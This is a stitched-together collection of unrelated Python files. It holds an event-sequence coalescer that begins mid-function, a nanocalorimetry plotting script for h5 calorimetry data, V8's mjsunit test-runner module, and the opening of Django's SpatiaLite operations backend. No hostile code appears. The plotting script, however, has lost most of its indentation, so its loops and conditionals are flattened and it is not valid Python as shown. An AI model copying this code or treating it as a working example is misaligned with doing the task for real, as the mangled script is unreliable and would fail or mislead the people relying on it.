    with no specs, read a single stream from stdin."""
    if len(specs) == 0:
        return iter(EventReader(sys.stdin))
    readers = [EventReader(input_spec_to_file(spec)) for spec in specs]
    return imerge(*readers)
class FollowSequences(object):
    """Replays an event stream, tracking one Sequence per id and invoking
    the overridable adding/noting/removing/forcedEnd callbacks."""
    def replay(self, events):
        """Feed `events` (time-ordered) through the per-id sequences.

        Sequences that never see a Quit are force-ended at the time of the
        last event in the stream.
        """
        connections = { }
        lastt = None;
        for e in events:
            id = e.id
            lastt = e.time
            if id not in connections:
                s = connections[id] = Sequence()
                self.addingSequence(s, e)
            else:
                s = connections[id]
            self.notingEvent(s, e)
            s.note(e)
            if s.ended():
                self.removingSequence(s, e)
                del connections[id]
            # Disabled: time-based expiry of idle sequences (> 60s gap).
            # Kept for reference; CoalesceSequences implements expiry.
            if False:
                expired = []
                for (id,s) in connections.iteritems():
                    w = s.timeto(e)
                    if w and float(w) > 60.0:
                        expired.append((id,s))
                for (id,s) in expired:
                    f = s.generateEnd(e.time)
                    self.forcedEnd(s, f)
                    self.removingSequence(s, f)
                    del connections[id]
        # Force-end whatever is still open when the stream ends.
        for s in connections.itervalues():
            f = s.generateEnd(lastt)
            self.forcedEnd(s, f)
            self.removingSequence(s, f)
    # Subclass hook: a new sequence was created for event e.
    def addingSequence(self, s, e):
        pass
    # Subclass hook: event e is about to be noted on sequence s.
    def notingEvent(self, s, e):
        pass
    # Subclass hook: sequence s was ended synthetically with event e.
    def forcedEnd(self, s, e):
        pass
    # Subclass hook: sequence s is being removed after event e.
    def removingSequence(self, s, e):
        pass
class CoalesceSequences(object):
    """Coalesces a time-ordered event stream into per-id CoalescedEvents,
    emitting each completed sequence (in start-time order) via fullSequence()."""
    def __init__(self):
        self.connections = { }  # id -> open CoalescedEvent
        self.bytime = [ ]       # heap of CoalescedEvents, ordered by start time
        self.starttime = None
        self.lasttime = None
    def heartbeat(self, n):
        """Write a progress line to stderr: elapsed time, event count, and
        the first few still-open sequences at the front of the heap."""
        sys.stderr.write("%s: %d events... (%d connections, %d waiting)\n"
            % (str(self.lasttime - self.starttime), n, len(self.connections), len(self.bytime)))
        n = 0
        i = 0
        l = len(self.bytime)
        s = ""
        # Summarize up to 5 open sequences, compressing runs of already
        # ended ones into "--count--" markers.
        while n < 5 and i < l:
            en = 0
            while i < l and self.bytime[i].ended:
                en += 1
                i += 1
            if en > 0:
                s += " : --%d--" % en
            else:
                n += 1
                s += " : %s(%s)" % (self.bytime[i].id, str(self.lasttime - self.bytime[i].lasttime))
                i += 1
        sys.stderr.write("    ")
        sys.stderr.write(s)
        sys.stderr.write("\n")
    def age_out(self, c):
        """Expire `c` if it is stale or past its max life; returns True if
        it was ended and removed from connections."""
        if c.staletime and self.lasttime >= c.staletime:
            sys.stderr.write("    expiring %s, stale\n" % c.id)
        elif c.maxtime and self.lasttime >= c.maxtime:
            sys.stderr.write("    expiring %s, maxed out\n" % c.id)
        else:
            return False
        c.endIfNeeded()
        del self.connections[c.id]
        return True
    def flush_completed(self):
        """Pop and emit finished sequences from the front of the heap,
        stopping at the first one that is still open and not expirable."""
        bytime = self.bytime
        while bytime:
            c = bytime[0]
            if not c.ended:
                if not self.age_out(c):
                    return
            heapq.heappop(bytime)
            self.fullSequence(c)
            # sys.stderr.write("    done %s\n" % c.id)
    def replay(self, events):
        """Consume `events`, coalescing per id with a 30s shelf life and
        180s max life, emitting completed sequences as they finish."""
        n = 0;
        connections = self.connections
        bytime = self.bytime
        for e in events:
            id = e.id
            self.lasttime = e.time
            if self.starttime is None:
                self.starttime = self.lasttime
            n += 1
            if n % 10000 == 0:
                self.heartbeat(n)
            # Expire a stale open sequence for this id before appending,
            # so the event starts a fresh one.
            if id in connections:
                c = connections[id]
                self.age_out(c)
            if id not in connections:
                c = connections[id] = CoalescedEvent(30.0, 180.0)
                c.add(e)
                heapq.heappush(bytime, c)
            else:
                c.add(e)
            if e.state == Event.End:
                del connections[id]
            self.flush_completed()
        # End-of-stream: close everything still open, then drain the heap.
        for d in connections.itervalues():
            d.endIfNeeded()
        self.flush_completed()
    # Subclass hook: called once per completed CoalescedEvent.
    def fullSequence(self, e):
        pass
| |
import time, copy
import os
import sys
import numpy
import h5py
#from PnSC_ui import *
#from PnSC_dataimport import *
from PnSC_SCui import *
#from PnSC_math import *
from PnSC_h5io import *
from PnSC_main import *
from matplotlib.ticker import FuncFormatter
import scipy.integrate
#celllist=[1, 2]+range(4, 21)+[22]+[24, 25]
# Cells to process; the full list above is commented out in favour of cell 11.
celllist=[11]
for selectcell in celllist:
print selectcell
p='C:/Users/JohnnyG/Documents/PythonCode/Vlassak/NanoCalorimetry/AuSiCu_pnsc_all.h5'
def myexpformat(x, pos):
for ndigs in range(2):
lab=(('%.'+'%d' %ndigs+'e') %x).replace('e+0','e').replace('e+','e').replace('e0','').replace('e-0','e-')
if eval(lab)==x:
return lab
return lab
ExpTickLabels=FuncFormatter(myexpformat)
def make_ticklabels_invisible(ax, x=True, y=True):
if x:
for tl in ax.get_xticklabels():
tl.set_visible(False)
if y:
for tl in ax.get_yticklabels():
tl.set_visible(False)
    def heatrate_T(d, T, Twin=10.):
        """Mean heating rate of segment dict `d` near temperature `T`.

        Selects samples whose temperature lies in [T-Twin, T+Twin], takes
        the longest contiguous run of such samples, and averages the heat
        rate over it.  Returns 0. if no samples fall in the window.
        NOTE(review): relies on the script-level `cycleindex` variable to
        pick the cycle — verify it is set before calling.
        """
        #i=numpy.argmin((T-d['sampletemperature'])**2)
        Ta=d['sampletemperature'][cycleindex]
        x=numpy.where((Ta>=T-Twin)&(Ta<=T+Twin))[0]
        # True at each index that begins a contiguous run within x.
        prev=numpy.array([not (t-1 in x) for t in x])
        previ=numpy.where(prev)[0]
        if len(previ)==0:
            return 0.
        # Run boundaries: each run spans previ[k]..stopi[k] within x.
        stopi=numpy.append(previ[1:],len(x))
        longestbunchind=numpy.argmax(stopi-previ)
        inds=x[previ[longestbunchind]:stopi[longestbunchind]]
        return d['sampleheatrate'][cycleindex][inds].mean()
    def findenthalpyandpinacles(segdict, critenth=1.e-5, dTmin=.4, Tmeanmin=100.):
        """Find heat-capacity peaks between zero crossings and integrate them.

        Splits the heat-capacity trace at its sign changes, integrates each
        segment over temperature, and keeps segments whose |enthalpy| exceeds
        `critenth`, whose temperature span exceeds `dTmin`, and whose
        C-weighted mean temperature is at least `Tmeanmin`.  Returns a list
        of dicts with enthalpy, peak position/height, weighted mean T, and
        the cycle index bounds.
        NOTE(review): relies on the script-level `cycleindex` variable.
        """
        T=segdict['sampletemperature'][cycleindex]
        C=segdict['sampleheatcapacity'][cycleindex]
        nci=numpy.where((C[:-1]>0.)&(C[1:]<=0.))[0]#neg crossings
        pci=numpy.where((C[1:]>0.)&(C[:-1]<=0.))[0]#pos crossings
        ci=numpy.sort(numpy.concatenate([nci, pci]))
        ans=[]
        for i, j in zip(ci[:-1], ci[1:]):
            # Enthalpy of this lobe: integral of C dT between crossings.
            enth=scipy.integrate.trapz(C[i:j], T[i:j])
            if numpy.abs(enth)>critenth and (T[j]-T[i])>dTmin:
                itemp=numpy.argmax(numpy.abs(C[i:j]))
                # Heat-capacity-weighted mean temperature of the lobe.
                Tmean=scipy.integrate.trapz(C[i:j]*T[i:j], T[i:j])/scipy.integrate.trapz(C[i:j], T[i:j])
                if Tmean<Tmeanmin:
                    continue
                ans+=[dict([('enthalpy', enth), ('T_Cmax', T[i:j][itemp]), ('Cmax', C[i:j][itemp]), ('Tweightedmean', Tmean), ('cycindstart', i), ('cycindstop', j)])]
        return ans
nskip=100
cycleindex=0
#p=mm.h5path
#f=h5py.File(p, mode='r+')
#f=h5py.File(p, mode='r')
savef='C:/Users/JohnnyG/Documents/HarvardWork/MG/PnSCplots/batchplotbycell_Aug28/'
plotTlim=(50., 700.)
metadictlist=[]
allsegdict=[]
f=h5py.File(p, mode='r')
if not `selectcell` in f['calbycellmetadata']:
print 'no cal data for ', selectcell
f.close()
continue
cg=f['calbycellmetadata'][`selectcell`]
for mg in cg.itervalues():
if isinstance(mg, h5py.Group) and 'Cpregions_enthalpy' in mg.attrs.keys():
d={}
for k, v in mg.attrs.iteritems():
d[k]=v
# if selectcell==1 and d['name'].startswith('heat1'):#heat1a was botched and heat1b we don't know cooling rate and the XRd for heat0 was questionable anyway
# continue
metadictlist+=[d]
allsegdict+=[CreateHeatProgSegDictList(p, d['name'], d['h5hpname'])]
xrddictlist=[]
if 'xrdbycell' in f and `selectcell` in f['xrdbycell']:
cg=f['xrdbycell'][`selectcell`]
for mg in cg.itervalues():
if isinstance(mg, h5py.Group):
d={}
for k, v in mg.attrs.iteritems():
d[k]=v
xrddictlist+=[d]
f.close()
orderarray=numpy.abs(numpy.array([metadict['prevcoolrate_320C'] for metadict in metadictlist]))
sortinds=numpy.argsort(orderarray)
cols=['b', (160./256.,160./256.,0), 'r', 'g', 'c', 'm', 'k']
## plotting series of heat ramps
mult=1.e6
nplots=len(orderarray)
pylab.figure(figsize=(8, 8))
axl=[pylab.subplot(nplots, 1, nplots)]
for i in range(1, nplots):
#ax=pylab.subplot2grid((n, 3), (n-1-i, 0), colspan=2, sharex=axl[0], sharey=axl[0])
#ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0], sharey=axl[0])
ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0])
pylab.setp(ax.get_xticklabels(), visible=False)
axl+=[ax]
namestack=[]
for count, i in enumerate(sortinds):
hpsdl=allsegdict[i]
metadict=metadictlist[i]
namestack+=[metadict['name']]
namestack='_'.join(namestack)
ymin, ymax=None, None
for count, i in enumerate(sortinds):
hpsdl=allsegdict[i]
metadict=metadictlist[i]
print metadict['name']
T=hpsdl[metadict['heatseg']]['sampletemperature'][cycleindex]
C=hpsdl[metadict['heatseg']]['sampleheatcapacity'][cycleindex]
tp=hpsdl[metadict['heatseg']]['cyclepartition'][cycleindex]
PdT=hpsdl[metadict['heatseg']]['samplepowerperrate'][cycleindex]
if selectcell==10 and metadict['name']=='heat2':
C=C[T<680]
T=T[T<680]
tp=tp[T<680]
PdT=PdT[T<680]
if selectcell==4 and metadict['name']=='heat1a':
print T.max()
C=C[T<615]
T=T[T<615]
tp=tp[T<615]
PdT=PdT[T<615]
if selectcell==4 and metadict['name']=='heat1b':
print T.max()
C=C[T<665]
T=T[T<665]
tp=tp[T<665]
PdT=PdT[T<665]
if selectcell==20 and metadict['name']=='heat1a':
print T.max()
C=C[T<665]
T=T[T<665]
tp=tp[T<665]
PdT=PdT[T<665]
if selectcell==20 and metadict['name']=='heat2':
print T.max()
C=C[T<635]
T=T[T<635]
tp=tp[T<635]
PdT=PdT[T<635]
##Cp plots
# axl[count].plot(T, mult*C, '-', color=cols[count], lw=1, label=metadict['name'])
#
# rxnindlist=[metadict['Cpregions_glassind'], metadict['Cpregions_xtalind'], metadict['Cpregions_meltind'], metadict['Cpregions_melt2ind']]
# for regind, (enth, Tp, Cp, Tmean, i, j) in enumerate(zip(metadict['Cpregions_enthalpy'], metadict['Cpregions_T_Cmax'], metadict['Cpregions_Cmax'], metadict['Cpregions_Tweightedmean'], metadict['Cpregions_cycindstart'], metadict['Cpregions_cycindstop'])):
# if regind in rxnindlist:
# col=cols[count]
# #col=['b', 'g', 'r'][rxnindlist.index(regind)]
# hatch=['/', '\\', '+', '+'][rxnindlist.index(regind)]
# else:
# continue
# axl[count].fill(T[i:j], mult*C[i:j], color=col, hatch=hatch, alpha=0.3)
# #axl[count].plot(Tp, mult*Cp, 'kx')
# #axl[count].plot(Tmean, 0, 'k*')
# pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
# for ax in axl:
# if selectcell==1:
# ax.set_ylim(-1.2, 5.4)
# ax.set_yticks([-1, 0, 2, 4])
# elif selectcell==2:
# ax.set_ylim(-.9, 8.6)
# ax.set_yticks([0, 2, 4, 6])
# elif selectcell==4:
# ax.set_ylim(-2.5, 11.8)
# ax.set_yticks([-2, 0, 2, 4, 6, 8])
# elif selectcell==5:
# ax.set_ylim(-2.6, 8.7)
# ax.set_yticks([-2, 0, 2, 4, 6])
# elif selectcell==8:
# ax.set_ylim(-1.1, 7.6)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==12:
# ax.set_ylim(-1.8, 6.8)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==13:
# ax.set_ylim(-1.6, 7.)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==14:
# ax.set_ylim(-1.8, 6.7)
# ax.set_yticks([-1, 0, 2, 4, 6])
# elif selectcell==18:
# ax.set_ylim(-1.1, 5.7)
# ax.set_yticks([-1, 0, 2, 4])
# elif selectcell==20:
# ax.set_ylim(-2.1, 5.9)
# ax.set_yticks([-2, 0, 2, 4])
# else:
# ax.set_ylim(-2.1, 4.9)
# ax.set_yticks([-2, 0, 2, 4])
# ax.set_xlim(plotTlim)
# axl[2].set_ylabel(r'Heat Capacity ($\mu$J/K), endothermic ->', fontsize=14)
# axl[0].set_xlabel('Temperature (C)', fontsize=14)
# headname='Cpstack'
##****
#Cp fit plots
colors=['k']+['b', 'g', 'm', 'y', 'c']*5
for i in range(-1, tp.max()+1):
if i<0:
al=0.5
else:
al=1.
if numpy.any(tp==i):
axl[count].plot(T[tp==i], mult*PdT[tp==i], '.', markersize=1, color=colors[i+1], alpha=al)
axl[count].plot(T, mult*(PdT-C), '-', color='r', lw=1)
temp=PdT[(T>plotTlim[0])&(T<plotTlim[1])]
if ymin is None:
ymin=temp.min()
ymax=temp.max()
else:
ymin=min(ymin, temp.min())
ymax=max(ymax, temp.max())
print mult*ymax
axl[count].set_ylim(mult*ymin, mult*ymax)
ymin*=mult
ymax*=mult
for ax in axl:
#ax.set_ylim(ymin, ymax)
# temp=[yv for l in ax.get_lines() for xd, yd in l.get_data() for yv in yd]
# ax.set_ylim(min(temp), max(temp))
ax.set_xlim(plotTlim)
headname='Cpfitstack'
axl[2].set_ylabel(r'Power per heat rate ($\mu$J/K)', fontsize=14)
axl[0].set_xlabel('Temperature (C)', fontsize=14)
pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
if selectcell==11:
axl[0].set_ylim(2., 6.5)
axl[0].set_yticks([2, 3, 4, 5, 6])
axl[1].set_ylim(2., 8.3)
axl[3].set_ylim(2., 13.9)
axl[4].set_ylim(2., 9.9)
#****
#pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), '%s_cell%02d_%s.png' %(headname, selectcell, namestack)))
###BELOW ARE THE EXTRA DATA PLOTS
# #only show xrd data if the prevname pnsc scan was the last performed before an xrd experiment
# phasecomps=[]
# for metadict in metadictlist:
# pcal=metadict['prevname'][:5]
# cal=metadict['name'][:5]
# c=numpy.zeros(3)
# if pcal!=cal:#if previous scan was in same heat# as scan then there was no xrd in between
# for d in xrddictlist:
# if d['name']==pcal:#use xrd that happened after the prev scan
# c=numpy.float32([d['amfrac'], d['othfrac'], d['fccfrac']])
# c=c/c.sum()
# print c
# break
# phasecomps+=[c]
#
# ##barplot
# pylab.figure(figsize=(3, 8))
# listofarraysorderedwithmetadictlist=phasecomps
# axl=[pylab.subplot(nplots, 1, nplots)]
# for i in range(1, nplots):
# #ax=pylab.subplot2grid((n, 3), (n-1-i, 0), colspan=2, sharex=axl[0], sharey=axl[0])
# ax=pylab.subplot(nplots, 1, nplots-i, sharex=axl[0], sharey=axl[0])
# pylab.setp(ax.get_xticklabels(), visible=False)
# axl+=[ax]
# maxval=0.
# for count, i in enumerate(sortinds):
# arr=listofarraysorderedwithmetadictlist[i]
# maxval=max(maxval,numpy.max(arr))
# axl[count].barh(range(len(arr)),arr,color=['y','g','r'],height=1)
# for ax in axl:
# ax.set_ylim(-.5, len(arr)+.5)
# ax.set_xlim((0., maxval*1.1))
# make_ticklabels_invisible(ax, x=False)
# axl[0].set_xlabel('phase fraction', fontsize=14)
# pylab.subplots_adjust(right=.95, top=0.95, hspace=0.01)
#
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'PhaseConcstack_cell%02d.png' %(selectcell)))
#
# #hatchlegend
# pylab.figure()
# for hatch, lab in zip(['/', '\\', '+'], ['glass trans.', 'crystallization', 'melting']):
# pylab.fill([0, 1, 0], [0, 1, 1], color='k', hatch=hatch, alpha=0.3, label=lab)
# pylab.legend()
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'CpRegionLegend_cell%02d_%s.png' %(selectcell, metadict['name'])))
#
# #plot cooling rates
# pylab.figure(figsize=(2, 8))
# for count, i in enumerate(sortinds):
# pylab.semilogx(numpy.abs(metadictlist[i]['prevcoolrate_320C']), count, 'o', color=cols[count], markersize=11)
# make_ticklabels_invisible(pylab.gca(), x=False)
# pylab.xlabel('cooling rate\nat 320C (K/s)', fontsize=14)
# pylab.ylim(-.5, count+.5)
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'Cool320Cstack_cell%02d.png' %(selectcell)))
#
## ##plot cooling rates
## pylab.figure(figsize=(2, 8))
## for count, i in enumerate(sortinds):
## pylab.semilogx(numpy.abs(metadictlist[i]['prevcoolrate_180C']), count, 'o', color=cols[count], markersize=11)
## make_ticklabels_invisible(pylab.gca(), x=False)
## pylab.xlabel('cooling rate\nat 180C (K/s)', fontsize=14)
## pylab.ylim(-.5, count+.5)
## pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'Cool180Cstack_cell%02d.png' %(selectcell)))
#
# ##plot heat rates
# pylab.figure(figsize=(2, 8))
# for count, i in enumerate(sortinds):
# pylab.semilogx(numpy.abs(metadictlist[i]['heatrate_170C500C']), count, 'o', color=cols[count], markersize=11)
# make_ticklabels_invisible(pylab.gca(), x=False)
# pylab.xlabel('heating rate (K/s)', fontsize=14)
# pylab.ylim(-.5, count+.5)
# pylab.savefig(os.path.join(os.path.join(savef, 'cell%02d' %selectcell), 'HeatRatestack_cell%02d.png' %(selectcell)))
# Display all figures generated above, then report completion (Python 2 print).
pylab.show()
print 'done'
| |
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from collections import OrderedDict
import itertools
import os
import re
from testrunner.local import statusfile
from testrunner.local import testsuite
from testrunner.objects import testcase
from testrunner.outproc import base as outproc
# Directive markers scanned for in each test's JS source text (see TestCase).
FILES_PATTERN = re.compile(r"//\s+Files:(.*)")
ENV_PATTERN = re.compile(r"//\s+Environment Variables:(.*)")
SELF_SCRIPT_PATTERN = re.compile(r"//\s+Env: TEST_FILE_NAME")
MODULE_PATTERN = re.compile(r"^// MODULE$", flags=re.MULTILINE)
NO_HARNESS_PATTERN = re.compile(r"^// NO HARNESS$", flags=re.MULTILINE)
# Flags known to misbehave when combining arbitrary mjsunit tests. Can also
# be compiled regular expressions.
COMBINE_TESTS_FLAGS_BLACKLIST = [
  '--check-handle-count',
  '--enable-tracing',
  re.compile('--experimental.*'),
  '--expose-trigger-failure',
  re.compile('--harmony.*'),
  '--mock-arraybuffer-allocator',
  '--print-ast',
  re.compile('--trace.*'),
  '--wasm-lazy-compilation',
]
class TestSuite(testsuite.TestSuite):
  def ListTests(self):
    """Collect every .js test under the suite root, skipping harness files."""
    tests = []
    for dirname, dirs, files in os.walk(self.root, followlinks=True):
      # Prune hidden directories in place so os.walk never descends into them.
      hidden = [d for d in dirs if d.startswith('.')]
      for d in hidden:
        dirs.remove(d)
      dirs.sort()
      files.sort()
      for filename in files:
        if not filename.endswith(".js"):
          continue
        if filename in ("mjsunit.js", "mjsunit_suppressions.js"):
          continue
        fullpath = os.path.join(dirname, filename)
        # Strip the root prefix and the ".js" suffix to get the test name.
        relpath = fullpath[len(self.root) + 1 : -3]
        testname = relpath.replace(os.path.sep, "/")
        tests.append(self._create_test(testname))
    return tests

  def _test_combiner_class(self):
    return TestCombiner

  def _test_class(self):
    return TestCase

  def _suppressed_test_class(self):
    return SuppressedTestCase
class TestCase(testcase.D8TestCase):
  def __init__(self, *args, **kwargs):
    """Parse the test's JS source for harness directives.

    Recognized directives: '// Files:', '// Environment Variables:',
    '// Env: TEST_FILE_NAME', '// MODULE' and '// NO HARNESS'.
    """
    super(TestCase, self).__init__(*args, **kwargs)

    source = self.get_source()

    files_list = []  # List of file names to append to command arguments.
    # Accept several lines of 'Files:'. (Fixed: dropped a stray trailing
    # semicolon and replaced the while-True/break loop with a plain
    # condition-controlled loop.)
    files_match = FILES_PATTERN.search(source)
    while files_match:
      files_list += files_match.group(1).strip().split()
      files_match = FILES_PATTERN.search(source, files_match.end())
    # Listed files are resolved relative to the repository root (two levels
    # above the suite root).
    files = [os.path.normpath(os.path.join(self.suite.root, '..', '..', f))
             for f in files_list]
    testfilename = os.path.join(self.suite.root,
                                self.path + self._get_suffix())
    if SELF_SCRIPT_PATTERN.search(source):
      # Expose the test's own file name to the test via -e.
      files = (
        ["-e", "TEST_FILE_NAME=\"%s\"" % testfilename.replace("\\", "\\\\")] +
        files)

    if NO_HARNESS_PATTERN.search(source):
      mjsunit_files = []
    else:
      mjsunit_files = [os.path.join(self.suite.root, "mjsunit.js")]

    files_suffix = []
    if MODULE_PATTERN.search(source):
      files_suffix.append("--module")
    files_suffix.append(testfilename)

    self._source_files = files
    self._source_flags = self._parse_source_flags(source)
    self._mjsunit_files = mjsunit_files
    self._files_suffix = files_suffix
    self._env = self._parse_source_env(source)

  def _parse_source_env(self, source):
    """Return {VAR: value} parsed from an 'Environment Variables:' directive."""
    env_match = ENV_PATTERN.search(source)
    env = {}
    if env_match:
      for env_pair in env_match.group(1).strip().split():
        var, value = env_pair.split('=')
        env[var] = value
    return env

  def _get_source_flags(self):
    return self._source_flags

  def _get_files_params(self):
    """Assemble d8 file arguments: extra sources, harness, then the test."""
    files = list(self._source_files)
    if not self._test_config.no_harness:
      files += self._mjsunit_files
    files += self._files_suffix

    if self._test_config.isolates:
      # Repeat the whole file set in a second isolate.
      files += ['--isolate'] + files
    return files

  def _get_cmd_env(self):
    return self._env

  def _get_source_path(self):
    return os.path.join(self.suite.root, self.path + self._get_suffix())
class TestCombiner(testsuite.TestCombiner):
  def get_group_key(self, test):
    """Combine tests with the same set of flags.

    Ignore:
    1. Some special cases where it's not obvious what to pass in the command.
    2. Tests with flags that can cause failure even inside try-catch wrapper.
    3. Tests that use async functions. Async functions can be scheduled after
       exiting from try-catch wrapper and cause failure.
    """
    # Tests needing extra files, env vars, or a non-standard harness setup
    # cannot be safely combined.
    needs_special_setup = (
        len(test._files_suffix) > 1 or
        test._env or
        not test._mjsunit_files or
        test._source_files)
    if needs_special_setup:
      return None

    source_flags = test._get_source_flags()
    has_blocking_flag = (
        '--expose-trigger-failure' in source_flags or
        '--throws' in source_flags)
    if has_blocking_flag:
      return None

    # Maybe we could just update the tests to await all async functions they
    # call?
    if 'async' in test.get_source():
      return None

    # TODO(machenbach): Remove grouping if combining tests in a flag-independent
    # way works well.
    return 1

  def _combined_test_class(self):
    return CombinedTest
class CombinedTest(testcase.D8TestCase):
  """Behaves like normal mjsunit tests except:
  1. Expected outcome is always PASS
  2. Instead of one file there is a try-catch wrapper with all combined tests
     passed as arguments.
  """
  def __init__(self, name, tests):
    super(CombinedTest, self).__init__(tests[0].suite, '', name,
                                       tests[0]._test_config)
    self._tests = tests

  def _prepare_outcomes(self, force_update=True):
    # Combined tests are always expected to pass (or time out).
    self._statusfile_outcomes = outproc.OUTCOMES_PASS_OR_TIMEOUT
    self.expected_outcomes = outproc.OUTCOMES_PASS_OR_TIMEOUT

  def _get_shell_flags(self):
    """In addition to standard set of shell flags it appends:
      --disable-abortjs: %AbortJS can abort the test even inside
        trycatch-wrapper, so we disable it.
      --es-staging: We blacklist all harmony flags due to false positives,
        but always pass the staging flag to cover the mature features.
      --omit-quit: Calling quit() in JS would otherwise early terminate.
      --quiet-load: suppress any stdout from load() function used by
        trycatch-wrapper.
    """
    return [
      '--test',
      '--disable-abortjs',
      '--es-staging',
      '--omit-quit',
      '--quiet-load',
    ]

  def _get_cmd_params(self):
    return (
        super(CombinedTest, self)._get_cmd_params() +
        ['tools/testrunner/trycatch_loader.js', '--'] +
        self._tests[0]._mjsunit_files +
        ['--'] +
        [t._files_suffix[0] for t in self._tests]
    )

  def _merge_flags(self, flags):
    """Merges flags from a list of flags.

    Flag values not starting with '-' are merged with the preceding flag,
    e.g. --foo 1 will become --foo=1. All other flags remain the same.

    Returns: A generator of flags.
    """
    if not flags:
      return
    # Iterate over flag pairs. ['-'] is a sentinel value for the last
    # iteration. Fixed: use the builtin zip instead of the Python-2-only
    # itertools.izip so this also runs under Python 3.
    for flag1, flag2 in zip(flags, flags[1:] + ['-']):
      if not flag2.startswith('-'):
        assert '=' not in flag1
        yield flag1 + '=' + flag2
      elif flag1.startswith('-'):
        yield flag1

  def _is_flag_blacklisted(self, flag):
    # Blacklist entries are either literal flag strings or compiled regexes.
    # Fixed: isinstance(item, str) replaces the Python-2-only basestring
    # check; all literal entries are plain str on both versions.
    for item in COMBINE_TESTS_FLAGS_BLACKLIST:
      if isinstance(item, str):
        if item == flag:
          return True
      elif item.match(flag):
        return True
    return False

  def _get_combined_flags(self, flags_gen):
    """Combines all flags - dedupes, keeps order and filters some flags.

    Args:
      flags_gen: Generator for flag lists.
    Returns: A list of flags.
    """
    merged_flags = self._merge_flags(list(itertools.chain(*flags_gen)))
    # OrderedDict deduplicates while preserving first-seen order.
    unique_flags = OrderedDict((flag, True) for flag in merged_flags).keys()
    return [
      flag for flag in unique_flags
      if not self._is_flag_blacklisted(flag)
    ]

  def _get_source_flags(self):
    # Combine flags from all source files.
    return self._get_combined_flags(
        test._get_source_flags() for test in self._tests)

  def _get_statusfile_flags(self):
    # Combine flags from all status file entries.
    return self._get_combined_flags(
        test._get_statusfile_flags() for test in self._tests)
class SuppressedTestCase(TestCase):
  """The same as a standard mjsunit test case with all asserts as no-ops."""
  def __init__(self, *args, **kwargs):
    super(SuppressedTestCase, self).__init__(*args, **kwargs)
    # Load the suppression harness after the regular mjsunit harness.
    suppressions = os.path.join(self.suite.root, "mjsunit_suppressions.js")
    self._mjsunit_files.append(suppressions)

  def _prepare_outcomes(self, *args, **kwargs):
    super(SuppressedTestCase, self)._prepare_outcomes(*args, **kwargs)
    # Skip tests expected to fail. We suppress all asserts anyways, but some
    # tests are expected to fail with type errors or even dchecks, and we
    # can't differentiate that.
    if statusfile.FAIL in self._statusfile_outcomes:
      self._statusfile_outcomes = [statusfile.SKIP]

  def _get_extra_flags(self, *args, **kwargs):
    base_flags = super(SuppressedTestCase, self)._get_extra_flags(
        *args, **kwargs)
    return base_flags + ['--disable-abortjs']
def GetSuite(*args, **kwargs):
  """Factory hook used by the test runner to instantiate this suite."""
  return TestSuite(*args, **kwargs)
| |
import re
from decimal import Decimal
from django.contrib.gis.db.backends.base import BaseSpatialOperations
from django.contrib.gis.db.backends.util import SpatialOperation, SpatialFunction
from django.contrib.gis.db.backends.spatialite.adapter import SpatiaLiteAdapter
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.base import DatabaseOperations
from django.db.utils import DatabaseError
from django.utils import six
class SpatiaLiteOperator(SpatialOperation):
    "For SpatiaLite operators (e.g. `&&`, `~`)."
    def __init__(self, operator):
        # Delegate to SpatialOperation, supplying only the operator token.
        super(SpatiaLiteOperator, self).__init__(operator=operator)
class SpatiaLiteFunction(SpatialFunction):
    "For SpatiaLite function calls."
    def __init__(self, function, **kwargs):
        # Pass the SQL function name (plus any template kwargs) straight through.
        super(SpatiaLiteFunction, self).__init__(function, **kwargs)
class SpatiaLiteFunctionParam(SpatiaLiteFunction):
    "For SpatiaLite functions that take another parameter."
    # The trailing %%s placeholder receives the extra lookup parameter.
    sql_template = '%(function)s(%(geo_col)s, %(geometry)s, %%s)'
class SpatiaLiteDistance(SpatiaLiteFunction):
    "For SpatiaLite distance operations."
    dist_func = 'Distance'
    # The comparison operator follows the Distance() call; the trailing %%s
    # placeholder receives the distance value.
    sql_template = '%(function)s(%(geo_col)s, %(geometry)s) %(operator)s %%s'
    def __init__(self, operator):
        super(SpatiaLiteDistance, self).__init__(self.dist_func,
                                                 operator=operator)
class SpatiaLiteRelate(SpatiaLiteFunctionParam):
